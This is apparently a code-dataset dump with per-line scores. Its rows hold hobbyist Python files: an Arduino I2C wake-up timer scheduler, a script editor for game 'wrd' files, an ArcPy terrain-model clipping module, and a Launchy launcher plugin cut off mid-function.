"\t\t\treturn\n", "\t\t\t\n", "\t\tfire = self.judge_timing(entry['timing'])\n", "\t\tif fire == False:\n", "\t\t\treturn\n", "\t\telif fire == \"done\":\n", "\t\t\tentry['status'] = 'done'\n", "\t\t\treturn\n", "\n", "\t\tif entry['type']=='power': #power control\n", "\t\t\tself.check_power_control(entry)\n", "\t\telif entry['type']=='speech': #speech control\n", "\t\t\tself.check_speech_control(entry)\n", "\t\telif entry['type']=='music': #speech control\n", "\t\t\tself.check_music_control(entry)\n", "\t\tentry['status'] = 'done'\n", "\t\t\n", "\tdef update(self):\n", 
"\t\tfor entry in self.data:\n", "\t\t\tself.check_entry(self.data[entry])\n", "\t\treturn\n", "\t\n", "\tdef get_wakeup_timer_request(self):\n", "\t\trequests=[]\n", "\t\tfor entry in self.data:\n", "\t\t\td = self.data[entry]\n", "\t\t\tif d['action'] =='wakeup' and d['type']=='power':\n", "\t\t\t\trequests.append(d['timing']['value'].split(\":\"))\n", "\t\treturn requests\n", "\n", "class ArduinoTimer():\n", "\tARDUINO_I2C_ADDR=0x10\n", "\tCMD_SET_WAKUP_TIMER01A = 0x11\n", "\tCMD_SET_WAKUP_TIMER01B = 0x12\n", "\tCMD_SET_WAKUP_TIMER02A = 0x21\n", "\tCMD_SET_WAKUP_TIMER02B = 0x22\n", "\tCMD_CLEAR_TIMER = 0x40\n", "\tCMD_SHUTDOWN_NOW = 0xFF\n", "\n", "\tdef __init__(self,motion_obj):\n", "\t\tself.conf = ap_music_server_conf.MusicServerConfig().get_conf()\n", "\t\tself.i2c = smbus.SMBus(1)\n", "\t\tself.first_setting = False\n", "\t\tself.motion = motion_obj\n", "\t\tself.schedule = Schedule(self.motion,self)\n", "\t\treturn\n", "\t\t\n", "\t@classmethod\n", "\tdef datetime_to_epoch(self,d):\n", "\t\treturn int(timec.mktime(d.timetuple()))\n", "\n", "\t@classmethod\n", "\tdef epoch_to_datetime(self,epoch):\n", "\t\treturn datetime(*timec.localtime(epoch)[:6])\n", "\t\n", "\tdef send_i2c_command(self,cmd,data):\n", "\t\tfor num in range(1,5):\n", "\t\t\ttry:\n", "\t\t\t\tself.i2c.write_block_data(self.ARDUINO_I2C_ADDR,cmd,data)\n", "\t\t\texcept IOError:\n", "\t\t\t\tlogging.debug(\"I2C IOerror in timer in Arduino communication > Retry\")\n", "\t\t\t\ttimec.sleep(num)\n", "\t\t\telse:\n", "\t\t\t\tlogging.debug(\"I2C send OK to Arduino\")\n", "\t\t\t\treturn True\n", "\t\treturn Flase\n", "\t\n", "\tdef set_timer(self,time):\n", "\t\ttarget = self.datetime_to_epoch(time)\n", "\t\tdiff = target - int(timec.time())\n", "\t\tdata1=[0,0]\n", "\t\tdata2=[0,0]\n", "\t\tdata1[0] = int((diff & 0xFF000000)>>24)\n", "\t\tdata1[1] = (diff & 0x00FF0000)>>16\n", "\t\tdata2[0] = (diff & 0x0000FF00)>>8\n", "\t\tdata2[1] = diff & 0x000000FF\n", "\t\t\n", "\t\tif diff<0:\n", 
"\t\t\treturn\n", "\t\tcmd = self.CMD_SET_WAKUP_TIMER01A\n", "\t\tlogging.debug(\"cmd=\"+str(cmd)+\" diff=\"+str(diff))\n", "\t\tlogging.debug(data1)\n", "\t\tself.send_i2c_command(cmd,data1)\n", "\t\ttimec.sleep(0.05)\n", "\t\tcmd = self.CMD_SET_WAKUP_TIMER01B\n", "\t\tlogging.debug(\"cmd=\"+str(cmd)+\" diff=\"+str(diff))\n", "\t\tlogging.debug(data2)\n", "\t\tself.send_i2c_command(cmd,data2)\n", "\t\treturn\n", "\n", "\tdef set_cmd(self,cmd,time):\n", "\t\tdata=[0,0]\n", "\t\tlogging.debug(\"cmd=\"+str(cmd))\n", "\t\tself.send_i2c_command(cmd,data)\n", "\t\treturn\n", "\t\n", "\tdef send_shutdown_request(self):\n", "\t\tlogging.debug('send_shutdown_request')\n", "\t\tself.set_cmd(self.CMD_SHUTDOWN_NOW,datetime.datetime.now())\n", "\t\treturn\n", "\n", "\tdef send_cleartimer_request(self):\n", "\t\tlogging.debug('send_cleartimer_request')\n", "\t\tself.set_cmd(self.CMD_CLEAR_TIMER,datetime.datetime.now())\n", "\t\treturn\n", "\n", "\tdef get_time(self,hour,min):\n", "\t\tnow = datetime.datetime.now()\n", "\t\ttomorrow = now + datetime.timedelta(days=1)\n", "\t\tt = datetime.datetime(now.year,now.month,now.day,hour,min,0)\n", "\t\tif t < now:\n", "\t\t\tt = datetime.datetime(tomorrow.year,tomorrow.month,tomorrow.day,hour,min,0)\n", "\t\treturn t\n", "\t\n", "\tdef set_timer_once(self):\n", "\t\tif self.first_setting:\n", "\t\t\treturn\n", "\t\tself.send_cleartimer_request()\n", "\t\tlogging.debug(\"set wake up timer\")\n", "\t\trequests = self.schedule.get_wakeup_timer_request()\n", "\t\tfor req in requests:\n", "\t\t\tt1 = self.get_time(int(req[0]),int(req[1]))\n", "\t\t\tlogging.debug(t1)\n", "\t\t\tself.set_timer(t1)\n", "\n", "\t\tself.first_setting = True\n", "\t\treturn\n", "\n", "\tdef check_event(self):\n", "\t\tmov_act = self.motion.get_latest_status()\n", "\t\t\n", "\t\tself.schedule.update()\n", "\t\treturn\n", "\r\n", "\tdef reload_schedule(self):\r\n", "\t\tlogging.debug(\"reload_schedule\")\r\n", "\t\tself.schedule = Schedule(self.motion,self)\r\n", 
"\t\tself.first_setting=False\r\n", "\t\tself.set_timer_once()\r\n", "\r\n", "\tdef p(self):\r\n", "\t\tprint(\"testestet\")" ]
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.06666666666666667, 0.047619047619047616, 0.015151515151515152, 0.1111111111111111, 0, 0.07142857142857142, 0.022727272727272728, 0.022222222222222223, 0.047619047619047616, 0, 0.08333333333333333, 0.02564102564102564, 0.047619047619047616, 0.041666666666666664, 0, 0.029411764705882353, 0.021739130434782608, 0.025, 0.04, 0.020833333333333332, 0, 0.038461538461538464, 0.015151515151515152, 0.08695652173913043, 0.057692307692307696, 0.6666666666666666, 0.2, 0.14285714285714285, 0.02702702702702703, 0.6666666666666666, 0.0625, 0.02702702702702703, 0.037037037037037035, 0.030303030303030304, 0.043859649122807015, 0, 0.017857142857142856, 0.015873015873015872, 0.06097560975609756, 0.015873015873015872, 0.029411764705882353, 0.05, 0.03571428571428571, 0.05, 0, 0.06451612903225806, 0.02857142857142857, 0.04, 0.11538461538461539, 0, 0.034482758620689655, 0.025, 0, 0, 0, 0.07142857142857142, 0.015151515151515152, 0.01818181818181818, 0.030303030303030304, 0.05555555555555555, 0.6666666666666666, 0.04, 0.037037037037037035, 0.037037037037037035, 0.029411764705882353, 0.6666666666666666, 0.1111111111111111, 0, 0.07142857142857142, 0.05128205128205128, 0.07407407407407407, 0.0392156862745098, 0.023255813953488372, 0.0625, 0.0625, 0.5, 0.08695652173913043, 0.07142857142857142, 0.6666666666666666, 0.05263157894736842, 0.06666666666666667, 0.1, 0.058823529411764705, 0.02127659574468085, 0.02127659574468085, 0.02127659574468085, 0.02631578947368421, 0.07692307692307693, 0.1, 0.1111111111111111, 0, 0.05128205128205128, 0.029411764705882353, 0.024390243902439025, 0.022727272727272728, 0.03125, 0.1111111111111111, 0, 0.05263157894736842, 0.03125, 0.023809523809523808, 0.029411764705882353, 0.047619047619047616, 0.1111111111111111, 0, 0.08333333333333333, 0.023255813953488372, 0.021739130434782608, 0.6666666666666666, 0.07142857142857142, 0.06976744186046512, 0.030303030303030304, 0.1111111111111111, 0.030303030303030304, 
0.05555555555555555, 0.05555555555555555, 0.125, 1, 0.0625, 0.03125, 0.045454545454545456, 0.6666666666666666, 0.11475409836065574, 0.07272727272727272, 0.07894736842105263, 0.04878048780487805, 0.0759493670886076, 0.057692307692307696, 0.06060606060606061, 0.014492753623188406, 0.07692307692307693, 0.057692307692307696, 0.06666666666666667, 0.6666666666666666, 0.06666666666666667, 0.03125, 0.1, 0.5, 0.022727272727272728, 0.1, 0.1, 0.043478260869565216, 0.03571428571428571, 0.1, 0, 0.09090909090909091, 0.02857142857142857, 0.08333333333333333, 0.027777777777777776, 0.0851063829787234, 0.02857142857142857, 0.037037037037037035, 0.6666666666666666, 0.05263157894736842, 0.038461538461538464, 0.02631578947368421, 0.1111111111111111, 1, 0.02702702702702703, 0.14285714285714285, 0.038461538461538464, 0.041666666666666664, 0.05660377358490566, 0.018867924528301886, 0.05555555555555555, 0, 0.045454545454545456, 0.08695652173913043, 0.058823529411764705, 0.058823529411764705, 0.058823529411764705, 0.058823529411764705, 0.06060606060606061, 0.06060606060606061, 0, 0.0625, 0.015151515151515152, 0.03571428571428571, 0.034482758620689655, 0.037037037037037035, 0.044444444444444446, 0.1111111111111111, 0.6666666666666666, 0.07142857142857142, 0.0625, 0.023809523809523808, 0, 0.07142857142857142, 0.05555555555555555, 0.02127659574468085, 1, 0.07894736842105263, 0.08, 0.125, 0.04838709677419355, 0.05263157894736842, 0.013333333333333334, 0.047619047619047616, 0.1111111111111111, 0.022727272727272728, 0.0625, 0.06666666666666667, 1, 0.07407407407407407, 0.025, 0.027777777777777776, 0.21428571428571427, 0.21428571428571427, 0.047619047619047616, 0.05405405405405406, 0.05555555555555555, 0.0625, 0.6666666666666666, 0.15384615384615385, 0.1, 0.027777777777777776, 0.018867924528301886, 0.043478260869565216, 0.05714285714285714, 0.05, 0.027777777777777776, 0.018867924528301886, 0.043478260869565216, 0.05714285714285714, 0.1111111111111111, 0, 0.10344827586206896, 0.23076923076923078, 
0.030303030303030304, 0.058823529411764705, 0.1111111111111111, 1, 0.029411764705882353, 0.024390243902439025, 0.03225806451612903, 0.1111111111111111, 0, 0.027777777777777776, 0.023255813953488372, 0.03278688524590164, 0.1111111111111111, 0, 0.1, 0.03125, 0.021739130434782608, 0.09523809523809523, 0.07142857142857142, 0.0759493670886076, 0.09090909090909091, 1, 0.037037037037037035, 0.04, 0.1, 0.030303030303030304, 0.02702702702702703, 0.018518518518518517, 0.043478260869565216, 0.0425531914893617, 0.047619047619047616, 0.045454545454545456, 0, 0.03571428571428571, 0.1111111111111111, 0, 0.041666666666666664, 0.022727272727272728, 0.6666666666666666, 0.04, 0.1111111111111111, 0, 0.034482758620689655, 0.027777777777777776, 0.043478260869565216, 0.07142857142857142, 0.04, 0, 0.06666666666666667, 0.1 ]
297
0.095472
false
################################################################################ ### Copyright © 2012-2013 BlackDragonHunt ### Copyright © 2012-2013 /a/nonymous scanlations ### ### This file is part of the Super Duper Script Editor. ### ### The Super Duper Script Editor is free software: you can redistribute it ### and/or modify it under the terms of the GNU General Public License as ### published by the Free Software Foundation, either version 3 of the License, ### or (at your option) any later version. ### ### The Super Duper Script Editor is distributed in the hope that it will be ### useful, but WITHOUT ANY WARRANTY; without even the implied warranty of ### MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the ### GNU General Public License for more details. ### ### You should have received a copy of the GNU General Public License ### along with the Super Duper Script Editor. ### If not, see <http://www.gnu.org/licenses/>. ################################################################################ from bitstring import ConstBitStream import os from wrd.ops import * from wrd.bin import to_bin, from_bin from wrd.python import to_python, from_python from wrd.scene import to_scene_info ################################################################################ ### A meta class for easy access to the relevant wrd parsing/converting fns, ### plus some helper functions for use in the editor. 
################################################################################ class WrdFile: def __init__(self, filename = None): self.commands = [] if not filename == None: if os.path.splitext(filename)[1].lower() == ".py": self.load_python(filename) else: self.load_bin(filename) ############################################################################## ### Binary ############################################################################## def load_bin(self, filename): data = ConstBitStream(filename = filename) self.from_bin(data) def save_bin(self, filename): data = self.to_bin() with open(filename, "wb") as f: data.tofile(f) def from_bin(self, data): self.commands = from_bin(data) def to_bin(self): return to_bin(self.commands) ############################################################################## ### Python ############################################################################## def load_python(self, filename): script = "" with open(filename, "rb") as f: script = f.read() self.from_python(script) def save_python(self, filename): script = self.to_python() with open(filename, "wb") as f: f.write(script) def from_python(self, script): self.commands = from_python(script) def to_python(self): return to_python(self.commands) ############################################################################## ### SceneInfo ############################################################################## def to_scene_info(self): return to_scene_info(self.commands) ############################################################################## ### Helper functions ############################################################################## def num_lines(self): lines = 0 for op, params in self.commands: if op == WRD_SHOW_LINE: lines += 1 return lines def max_line(self): max = 0 for op, params in self.commands: if op == WRD_SHOW_LINE and params["line"] > max: max = params["line"] return max def insert_line_after(self, insert_after): 
self.insert_line(insert_after, before = False) def insert_line_before(self, insert_before): self.insert_line(insert_before, before = True) ###################################################################### ### Inserts a new line relative to the target line. ###################################################################### def insert_line(self, target, before = False): found = False new_line = self.max_line() + 1 index = 0 for i, (op, params) in enumerate(self.commands): if op == WRD_SHOW_LINE and params["line"] == target: found = True # If we're inserting before a line, then just take this index and go. if before: index = i break # If we're inserting after a line, though, wait until we find the nearest # wait-for-input command and insert after that. if op == WRD_WAIT_INPUT and found: index = i + 1 break if not found: raise Exception("Could not insert line. Reference line %d does not exist." % target) # Insert our command backwards so we don't have to worry about index shifting. self.commands.insert(index, (WRD_WAIT_INPUT, {})) self.commands.insert(index, (WRD_WAIT_FRAME, {"frames": 1})) self.commands.insert(index, (WRD_SHOW_LINE, {"line": new_line})) return new_line def main(): import glob import time # wrds = glob.iglob("wrds-sdr2/e00*.wrd") # pys = glob.iglob("wrds-sdr2/e00*.py") wrds = glob.iglob("wip/wrds-sdr2/e01*.wrd") # pys = glob.iglob("wip/wrds-sdr2/*.py") wrd = WrdFile() # start = time.time() # for filename in wrds: # wrd.load_bin(filename) # print "Took", time.time() - start, "seconds to parse wrds." # start = time.time() # for filename in pys: # wrd.load_python(filename) # wrd_file = os.path.splitext(filename)[0]# + ".wrd" # wrd.save_bin(wrd_file) # print "Took", time.time() - start, "seconds to parse pys." 
# return for filename in wrds: print filename orig = ConstBitStream(filename = filename) test = WrdFile(filename) # if test.num_lines() > 0: # script = test.to_python() # with open(filename + "-1.py", "wb") as f: # f.write(script) # test.insert_line(0) # script = test.to_python() # with open(filename + "-2.py", "wb") as f: # f.write(script) script = test.to_python() with open(filename + ".py", "wb") as f: f.write(script) test.from_python(script) out = test.to_bin() if not orig == out: # print filename print " Didn't match!" with open(filename + "-out", "wb") as f: out.tofile(f) with open(filename + ".py", "wb") as f: f.write(script) if __name__ == "__main__": main() ### EOF ###
[ "################################################################################\n", "### Copyright © 2012-2013 BlackDragonHunt\n", "### Copyright © 2012-2013 /a/nonymous scanlations\n", "### \n", "### This file is part of the Super Duper Script Editor.\n", "### \n", "### The Super Duper Script Editor is free software: you can redistribute it\n", "### and/or modify it under the terms of the GNU General Public License as\n", "### published by the Free Software Foundation, either version 3 of the License,\n", "### or (at your option) any later version.\n", "### \n", "### The Super Duper Script Editor is distributed in the hope that it will be\n", "### useful, but WITHOUT ANY WARRANTY; without even the implied warranty of\n", "### MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n", "### GNU General Public License for more details.\n", "### \n", "### You should have received a copy of the GNU General Public License\n", "### along with the Super Duper Script Editor.\n", "### If not, see <http://www.gnu.org/licenses/>.\n", "################################################################################\n", "\n", "from bitstring import ConstBitStream\n", "import os\n", "\n", "from wrd.ops import *\n", "\n", "from wrd.bin import to_bin, from_bin\n", "from wrd.python import to_python, from_python\n", "from wrd.scene import to_scene_info\n", "\n", "################################################################################\n", "### A meta class for easy access to the relevant wrd parsing/converting fns,\n", "### plus some helper functions for use in the editor.\n", "################################################################################\n", "class WrdFile:\n", " def __init__(self, filename = None):\n", " \n", " self.commands = []\n", " \n", " if not filename == None:\n", " if os.path.splitext(filename)[1].lower() == \".py\":\n", " self.load_python(filename)\n", " else:\n", " self.load_bin(filename)\n", " \n", " 
##############################################################################\n", " ### Binary\n", " ##############################################################################\n", " def load_bin(self, filename):\n", " data = ConstBitStream(filename = filename)\n", " self.from_bin(data)\n", " \n", " def save_bin(self, filename):\n", " data = self.to_bin()\n", " with open(filename, \"wb\") as f:\n", " data.tofile(f)\n", " \n", " def from_bin(self, data):\n", " self.commands = from_bin(data)\n", " \n", " def to_bin(self):\n", " return to_bin(self.commands)\n", " \n", " ##############################################################################\n", " ### Python\n", " ##############################################################################\n", " def load_python(self, filename):\n", " script = \"\"\n", " \n", " with open(filename, \"rb\") as f:\n", " script = f.read()\n", " \n", " self.from_python(script)\n", " \n", " def save_python(self, filename):\n", " script = self.to_python()\n", " with open(filename, \"wb\") as f:\n", " f.write(script)\n", " \n", " def from_python(self, script):\n", " self.commands = from_python(script)\n", " \n", " def to_python(self):\n", " return to_python(self.commands)\n", " \n", " ##############################################################################\n", " ### SceneInfo\n", " ##############################################################################\n", " def to_scene_info(self):\n", " return to_scene_info(self.commands)\n", " \n", " ##############################################################################\n", " ### Helper functions\n", " ##############################################################################\n", " def num_lines(self):\n", " lines = 0\n", " \n", " for op, params in self.commands:\n", " if op == WRD_SHOW_LINE:\n", " lines += 1\n", " \n", " return lines\n", " \n", " def max_line(self):\n", " max = 0\n", " \n", " for op, params in self.commands:\n", " if op == WRD_SHOW_LINE and 
params[\"line\"] > max:\n", " max = params[\"line\"]\n", " \n", " return max\n", " \n", " def insert_line_after(self, insert_after):\n", " self.insert_line(insert_after, before = False)\n", " \n", " def insert_line_before(self, insert_before):\n", " self.insert_line(insert_before, before = True)\n", " \n", " ######################################################################\n", " ### Inserts a new line relative to the target line.\n", " ######################################################################\n", " def insert_line(self, target, before = False):\n", " \n", " found = False\n", " new_line = self.max_line() + 1\n", " index = 0\n", " \n", " for i, (op, params) in enumerate(self.commands):\n", " if op == WRD_SHOW_LINE and params[\"line\"] == target:\n", " found = True\n", " \n", " # If we're inserting before a line, then just take this index and go.\n", " if before:\n", " index = i\n", " break\n", " \n", " # If we're inserting after a line, though, wait until we find the nearest\n", " # wait-for-input command and insert after that.\n", " if op == WRD_WAIT_INPUT and found:\n", " index = i + 1\n", " break\n", " \n", " if not found:\n", " raise Exception(\"Could not insert line. 
Reference line %d does not exist.\" % target)\n", " \n", " # Insert our command backwards so we don't have to worry about index shifting.\n", " self.commands.insert(index, (WRD_WAIT_INPUT, {}))\n", " self.commands.insert(index, (WRD_WAIT_FRAME, {\"frames\": 1}))\n", " self.commands.insert(index, (WRD_SHOW_LINE, {\"line\": new_line}))\n", " \n", " return new_line\n", "\n", "def main():\n", " \n", " import glob\n", " import time\n", "\n", " # wrds = glob.iglob(\"wrds-sdr2/e00*.wrd\")\n", " # pys = glob.iglob(\"wrds-sdr2/e00*.py\")\n", " wrds = glob.iglob(\"wip/wrds-sdr2/e01*.wrd\")\n", " # pys = glob.iglob(\"wip/wrds-sdr2/*.py\")\n", " \n", " wrd = WrdFile()\n", " \n", " # start = time.time()\n", " # for filename in wrds:\n", " # wrd.load_bin(filename)\n", " # print \"Took\", time.time() - start, \"seconds to parse wrds.\"\n", " \n", " # start = time.time()\n", " # for filename in pys:\n", " # wrd.load_python(filename)\n", " # wrd_file = os.path.splitext(filename)[0]# + \".wrd\"\n", " # wrd.save_bin(wrd_file)\n", " # print \"Took\", time.time() - start, \"seconds to parse pys.\"\n", " \n", " # return\n", " \n", " for filename in wrds:\n", " \n", " print filename\n", " \n", " orig = ConstBitStream(filename = filename)\n", " test = WrdFile(filename)\n", " \n", " # if test.num_lines() > 0:\n", " # script = test.to_python()\n", " # with open(filename + \"-1.py\", \"wb\") as f:\n", " # f.write(script)\n", " \n", " # test.insert_line(0)\n", " # script = test.to_python()\n", " # with open(filename + \"-2.py\", \"wb\") as f:\n", " # f.write(script)\n", " \n", " script = test.to_python()\n", " with open(filename + \".py\", \"wb\") as f:\n", " f.write(script)\n", " test.from_python(script)\n", " out = test.to_bin()\n", " \n", " if not orig == out:\n", " # print filename\n", " print \" Didn't match!\"\n", " \n", " with open(filename + \"-out\", \"wb\") as f:\n", " out.tofile(f)\n", " \n", " with open(filename + \".py\", \"wb\") as f:\n", " f.write(script)\n", " \n", "if 
__name__ == \"__main__\":\n", " main()\n", "\n", "### EOF ###" ]
[ 0.012345679012345678, 0.023809523809523808, 0.02, 0.2, 0.017857142857142856, 0.2, 0.013157894736842105, 0.013513513513513514, 0.0125, 0.023255813953488372, 0.2, 0.012987012987012988, 0.013333333333333334, 0.015151515151515152, 0.02040816326530612, 0.2, 0.014285714285714285, 0.021739130434782608, 0.020833333333333332, 0.012345679012345678, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.012345679012345678, 0.012987012987012988, 0.018518518518518517, 0.012345679012345678, 0.06666666666666667, 0.07692307692307693, 0.2, 0, 0.2, 0.034482758620689655, 0.017543859649122806, 0, 0.08333333333333333, 0, 0.3333333333333333, 0.024691358024691357, 0.15384615384615385, 0.024691358024691357, 0.03125, 0.0425531914893617, 0, 0.3333333333333333, 0.03125, 0, 0, 0.047619047619047616, 0.3333333333333333, 0.03571428571428571, 0, 0.3333333333333333, 0.05, 0, 0.3333333333333333, 0.024691358024691357, 0.15384615384615385, 0.024691358024691357, 0.02857142857142857, 0, 0.2, 0, 0.041666666666666664, 0.2, 0, 0.3333333333333333, 0.02857142857142857, 0, 0, 0.045454545454545456, 0.3333333333333333, 0.030303030303030304, 0, 0.2, 0.043478260869565216, 0, 0.3333333333333333, 0.024691358024691357, 0.125, 0.024691358024691357, 0.037037037037037035, 0, 0.3333333333333333, 0.024691358024691357, 0.08695652173913043, 0.024691358024691357, 0.043478260869565216, 0, 0.2, 0, 0.03333333333333333, 0, 0.2, 0, 0.3333333333333333, 0.045454545454545456, 0, 0.2, 0, 0.01818181818181818, 0, 0.2, 0, 0.3333333333333333, 0.022222222222222223, 0.0392156862745098, 0.3333333333333333, 0.02127659574468085, 0.0392156862745098, 0.3333333333333333, 0.0136986301369863, 0.037037037037037035, 0.0136986301369863, 0.061224489795918366, 0.2, 0.047619047619047616, 0, 0.058823529411764705, 0.2, 0, 0.01694915254237288, 0, 0.1111111111111111, 0, 0, 0.05, 0.0625, 0.14285714285714285, 0.0125, 0.018518518518518517, 0.024390243902439025, 0, 0, 0.2, 0, 0.02197802197802198, 0.2, 0.012048192771084338, 0, 0, 0, 0.2, 0, 0, 0.08333333333333333, 
0.3333333333333333, 0.07142857142857142, 0.07142857142857142, 0, 0.022727272727272728, 0.023255813953488372, 0.021739130434782608, 0.022727272727272728, 0.3333333333333333, 0.05555555555555555, 0.3333333333333333, 0.041666666666666664, 0.038461538461538464, 0.034482758620689655, 0.015625, 0.3333333333333333, 0.041666666666666664, 0.04, 0.03125, 0.017543859649122806, 0.034482758620689655, 0.015873015873015872, 0.3333333333333333, 0.09090909090909091, 0.3333333333333333, 0.041666666666666664, 0.2, 0, 0.2, 0.0425531914893617, 0, 0.2, 0, 0.058823529411764705, 0.04, 0.038461538461538464, 0.14285714285714285, 0.07142857142857142, 0.058823529411764705, 0.04, 0.038461538461538464, 0.2, 0, 0, 0.045454545454545456, 0, 0, 0.2, 0, 0.043478260869565216, 0.03333333333333333, 0.2, 0.02127659574468085, 0, 0.14285714285714285, 0.021739130434782608, 0, 0.3333333333333333, 0.037037037037037035, 0.1111111111111111, 0, 0.18181818181818182 ]
215
0.075501
false
##### Description of this python file ##### # This is the location for the DTM preparation module in the model. ##### VARIABLES - Used in this file##### # #---------------------------------------------------------------------# ##### START OF CODE ##### ### Import statements - Python ### import arcpy from arcpy.sa import * # Function to fill the DTM, calculate flow directions and cell size of the DTM. def DTM_preparation(DTM): # Calculate some stats for the DTM # Fill the raster DTM_fill = Fill(DTM) arcpy.AddMessage("Filled digital terrain model") arcpy.AddMessage("-----------------------") arcpy.SetProgressorPosition(5) # Calculate the flow direction of the DTM DTM_flow_direction = FlowDirection(DTM_fill) arcpy.AddMessage("Calculated flow direction") arcpy.AddMessage("-----------------------") # Get the cell size #Get the geoprocessing result object DTM_cell_size = arcpy.GetRasterProperties_management(DTM, "CELLSIZEX") #Get the elevation standard deviation value from geoprocessing result object cell_size = DTM_cell_size.getOutput(0) arcpy.AddMessage("Calculated cell size") arcpy.AddMessage("-----------------------") return DTM_fill, DTM_flow_direction, cell_size # Function to clip the DTM def DTM_clip(DTM_BNG, catch_extent, river_catchment_BNG): # Clip the DTM DTM_clip = arcpy.Clip_management(DTM_BNG, catch_extent, "MODEL_DTM", river_catchment_BNG, "#", "ClippingGeometry") #DTM_Clip1 = arcpy.gp.ExtractByMask_sa(DTM_Clip, river_catchment_BNG, "MODEL_DTM1") arcpy.AddMessage("Digital Terrain Model (DTM) clipped to catchment") arcpy.AddMessage("-------------------------") # Convert DTM to np array DTM_clip_np = arcpy.RasterToNumPyArray("MODEL_DTM", '#','#','#', -9999) # Find the characteristics of the DTM # Determine cell size desc_DTM = arcpy.Describe(DTM_clip) DTM_cell_size = desc_DTM.meanCellHeight arcpy.AddMessage("The model is working on a cell size of " + str(DTM_cell_size) + " metres.") DTM_extent = desc_DTM.Extent # Turns the corner into a point 
bottom_left_corner = arcpy.Point(DTM_extent.XMin, DTM_extent.YMin) return DTM_clip, DTM_cell_size, bottom_left_corner
[ "##### Description of this python file #####\n", "# This is the location for the DTM preparation module in the model.\n", "\n", "\n", "##### VARIABLES - Used in this file#####\n", "# \n", "\n", "#---------------------------------------------------------------------#\n", "##### START OF CODE #####\n", "### Import statements - Python ###\n", "import arcpy\n", "from arcpy.sa import *\n", "\n", "# Function to fill the DTM, calculate flow directions and cell size of the DTM.\n", "def DTM_preparation(DTM):\n", " # Calculate some stats for the DTM\n", " # Fill the raster\n", " DTM_fill = Fill(DTM)\n", " arcpy.AddMessage(\"Filled digital terrain model\")\n", " arcpy.AddMessage(\"-----------------------\")\n", " arcpy.SetProgressorPosition(5)\n", "\n", " # Calculate the flow direction of the DTM\n", " DTM_flow_direction = FlowDirection(DTM_fill)\n", " arcpy.AddMessage(\"Calculated flow direction\")\n", " arcpy.AddMessage(\"-----------------------\")\n", "\n", " # Get the cell size \n", " #Get the geoprocessing result object\n", " DTM_cell_size = arcpy.GetRasterProperties_management(DTM, \"CELLSIZEX\")\n", " #Get the elevation standard deviation value from geoprocessing result object\n", " cell_size = DTM_cell_size.getOutput(0) \n", " arcpy.AddMessage(\"Calculated cell size\")\n", " arcpy.AddMessage(\"-----------------------\")\n", "\n", " return DTM_fill, DTM_flow_direction, cell_size\n", "\n", "# Function to clip the DTM\n", "def DTM_clip(DTM_BNG, catch_extent, river_catchment_BNG):\n", " # Clip the DTM\n", " DTM_clip = arcpy.Clip_management(DTM_BNG, catch_extent, \"MODEL_DTM\", river_catchment_BNG, \"#\", \"ClippingGeometry\")\n", " #DTM_Clip1 = arcpy.gp.ExtractByMask_sa(DTM_Clip, river_catchment_BNG, \"MODEL_DTM1\")\n", " arcpy.AddMessage(\"Digital Terrain Model (DTM) clipped to catchment\")\n", " arcpy.AddMessage(\"-------------------------\")\n", "\n", " # Convert DTM to np array\n", " DTM_clip_np = arcpy.RasterToNumPyArray(\"MODEL_DTM\", '#','#','#', -9999)\n", 
"\n", " # Find the characteristics of the DTM\n", " # Determine cell size\n", " desc_DTM = arcpy.Describe(DTM_clip)\n", " DTM_cell_size = desc_DTM.meanCellHeight\n", " arcpy.AddMessage(\"The model is working on a cell size of \" + str(DTM_cell_size) + \" metres.\")\n", " DTM_extent = desc_DTM.Extent\n", "\n", " # Turns the corner into a point\n", " bottom_left_corner = arcpy.Point(DTM_extent.XMin, DTM_extent.YMin)\n", "\n", " return DTM_clip, DTM_cell_size, bottom_left_corner" ]
[ 0.022727272727272728, 0, 0, 0, 0.024390243902439025, 0.3333333333333333, 0, 0.013888888888888888, 0.038461538461538464, 0.02857142857142857, 0, 0, 0, 0, 0.038461538461538464, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.04, 0.024390243902439025, 0, 0.024691358024691357, 0.022727272727272728, 0, 0, 0, 0, 0, 0, 0.017241379310344827, 0, 0.008403361344537815, 0.022727272727272728, 0, 0, 0, 0, 0.02631578947368421, 0, 0, 0, 0, 0, 0.01020408163265306, 0, 0, 0, 0, 0, 0.018518518518518517 ]
59
0.01212
false
# Copyright (c) 2008 Shahar Kosti # # This program is free software; you can redistribute it and/or modify it under # the terms of the GNU General Public License as published by the Free Software # Foundation; either version 2 of the License, or (at your option) any later # version. # # This program is distributed in the hope that it will be useful, but WITHOUT # ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS # FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. # # You should have received a copy of the GNU General Public License along with # this program; if not, write to the Free Software Foundation, Inc., # 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. #import rpdb2; rpdb2.start_embedded_debugger("password") import launchy import sys, os import subprocess from subprocess import Popen, PIPE class PyVerby(launchy.Plugin): def __init__(self): launchy.Plugin.__init__(self) self.icon = os.path.join(launchy.getIconsPath(), "pysimple.png") self.hash = launchy.hash(self.getName()) self.labelHash = launchy.hash("pyverby") def init(self): pass def getID(self): return self.hash def getName(self): return "PyVerby" def getIcon(self): return self.icon def getLabels(self, inputDataList): pass def getResults(self, inputDataList, resultsList): if len(inputDataList) < 1: return text = inputDataList[0].getText() isVerbyQuery = ( text[-4:-1] == " " ) print "%s##%s##%s" % (text, text[-4:-1], isVerbyQuery) if not isVerbyQuery: return text = text[:-4] isFileOrDir = os.path.isdir(text) or os.path.isfile(text) print "%s##%s" % (text, isFileOrDir) if not isFileOrDir: return runmenuApp = 'C:\\Program Files\\Launchy\\plugins\\python\\runmenu\\runmenu.exe' runmenu = Popen([runmenuApp, "/list", text], stdout=PIPE, startupinfo=self.__startupinfo) output = runmenu.stdout.read() splitted = output.split("\r\n") for command in splitted: if command == "": continue verbIdx = command.rfind("(Verb:") if verbIdx > -1: commandToExec 
